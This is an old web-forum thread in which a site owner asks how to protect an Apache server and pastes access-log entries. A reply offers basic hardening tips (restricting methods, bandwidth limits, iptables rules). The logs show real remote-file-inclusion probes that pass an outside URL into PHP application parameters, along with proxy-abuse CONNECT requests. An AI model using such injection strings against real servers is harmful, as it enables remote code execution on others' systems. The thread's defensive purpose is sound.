Jump to content

Recommended Posts

hi, i need help securing my apache server from attacks. can anyone give me some advice?

 

here is some successful attack logs, copied from my servers access.log:

 

68.13.244.72 - - [04/Sep/2007:13:22:19 -0600] "GET / HTTP/1.1" 304 -
68.13.244.72 - - [04/Sep/2007:13:22:29 -0600] "GET / HTTP/1.1" 304 -
68.13.244.72 - - [04/Sep/2007:13:22:43 -0600] "GET / HTTP/1.1" 304 -
68.13.244.72 - - [04/Sep/2007:13:23:19 -0600] "GET / HTTP/1.1" 304 -
68.13.213.72 - - [04/Sep/2007:13:23:19 -0600] "GET / HTTP/1.1" 304 -

this was a DOS attack of some sort. after a while my server crashed, then i got knocked completely off the internet (had to restart my modem/router) this is all the log showed at that time.

 

 

85.190.0.3 - - [04/Sep/2007:00:49:13 -0600] "CONNECT 213.92.8.7:31204 HTTP/1.0" 405 235
85.190.0.3 - - [04/Sep/2007:00:49:12 -0600] "POST http://213.92.8.7:31204/ HTTP/1.0" 200 274
64.71.165.195 - - [04/Sep/2007:00:49:21 -0600] "CONNECT 216.179.62.106:6667 HTTP/1.0" 405 235
213.195.77.166 - - [04/Sep/2007:09:21:20 -0600] "GET /ad_main.php?_mygamefile=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 209
213.195.77.166 - - [04/Sep/2007:09:21:20 -0600] "GET /live/help.php?css_path=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 211
213.195.77.166 - - [04/Sep/2007:09:21:21 -0600] "GET /php/mambo/index2.php?_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 218
213.195.77.166 - - [04/Sep/2007:09:21:21 -0600] "GET /dotproject/includes/db_adodb.php?baseDir=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 230
213.195.77.166 - - [04/Sep/2007:09:21:22 -0600] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.sexyisabela.as.ro/a.txt?&// HTTP/1.1" 404 268
213.195.77.166 - - [04/Sep/2007:09:21:22 -0600] "GET /phplive/setup/header.php?css_path=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 222

this was a successful PHP injection attack

 

how can i prevent these attacks? i'm more concerned with the DOS attacks. i basically still have the default httpd config file, so if anyone has some advice on what i should add to it, (for security) i would appreciate it

also some questions:

- if my website is only for reading/viewing purposes, and nothing else, is it possible to completely refuse "CONNECT" and "POST" requests, and only allow "GET" requests ? if so, how

- is there a way to limit my servers usage/bandwidth so it doesn't go over that amount and make my system crash?

- does anyone know of a good firewall (software) that blocks all ICMP/ping requests to my machine?

 

thanks to anyone that can help  :)

Link to comment
https://forums.phpfreaks.com/topic/68000-security/
Share on other sites

hi, i need help securing my apache server from attacks. can anyone give me some advice?

here is some successful attack logs, copied from my servers access.log:

68.13.244.72 - - [04/Sep/2007:13:22:19 -0600] "GET / HTTP/1.1" 304 -
68.13.244.72 - - [04/Sep/2007:13:22:29 -0600] "GET / HTTP/1.1" 304 -
68.13.244.72 - - [04/Sep/2007:13:22:43 -0600] "GET / HTTP/1.1" 304 -
68.13.244.72 - - [04/Sep/2007:13:23:19 -0600] "GET / HTTP/1.1" 304 -
68.13.213.72 - - [04/Sep/2007:13:23:19 -0600] "GET / HTTP/1.1" 304 -

this was a DOS attack of some sort. after a while my server crashed, then i got knocked completely off the internet (had to restart my modem/router) this is all the log showed at that time.

Was this all!!! - 4 304's?

This on its own should not have caused the network to go down. If there were 1000's of entries in the log, that;d be something else.

 

 

85.190.0.3 - - [04/Sep/2007:00:49:13 -0600] "CONNECT 213.92.8.7:31204 HTTP/1.0" 405 235
85.190.0.3 - - [04/Sep/2007:00:49:12 -0600] "POST http://213.92.8.7:31204/ HTTP/1.0" 200 274

^This seems to be of concern.

64.71.165.195 - - [04/Sep/2007:00:49:21 -0600] "CONNECT 216.179.62.106:6667 HTTP/1.0" 405 235
213.195.77.166 - - [04/Sep/2007:09:21:20 -0600] "GET /ad_main.php?_mygamefile=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 209
213.195.77.166 - - [04/Sep/2007:09:21:20 -0600] "GET /live/help.php?css_path=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 211
213.195.77.166 - - [04/Sep/2007:09:21:21 -0600] "GET /php/mambo/index2.php?_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 218
213.195.77.166 - - [04/Sep/2007:09:21:21 -0600] "GET /dotproject/includes/db_adodb.php?baseDir=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 230
213.195.77.166 - - [04/Sep/2007:09:21:22 -0600] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.sexyisabela.as.ro/a.txt?&// HTTP/1.1" 404 268
213.195.77.166 - - [04/Sep/2007:09:21:22 -0600] "GET /phplive/setup/header.php?css_path=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 222

^ have you any of the above files?404 means file not found.

 

 

how can i prevent these attacks? i'm more concerned with the DOS attacks. i basically still have the default httpd config file, so if anyone has some advice on what i should add to it, (for security) i would appreciate it

also some questions:

- if my website is only for reading/viewing purposes, and nothing else, is it possible to completely refuse "CONNECT" and "POST" requests, and only allow "GET" requests ? if so, how

<directory /var/www/>

Limit Get

</directory>

^Something like that will work.

 

- is there a way to limit my servers usage/bandwidth so it doesn't go over that amount and make my system crash?

^mod_bandwidth for apache

 

- does anyone know of a good firewall (software) that blocks all ICMP/ping requests to my machine?

iptables

 

To install: apt-get install iptables

 

To block IMCP:

iptables -A INPUT -p icmp -j REJECT

 

My wiki on iptables: http://wiki.kartbuilding.net/index.php/Iptables_Firewall

 

-steve

Link to comment
https://forums.phpfreaks.com/topic/68000-security/#findComment-342388
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.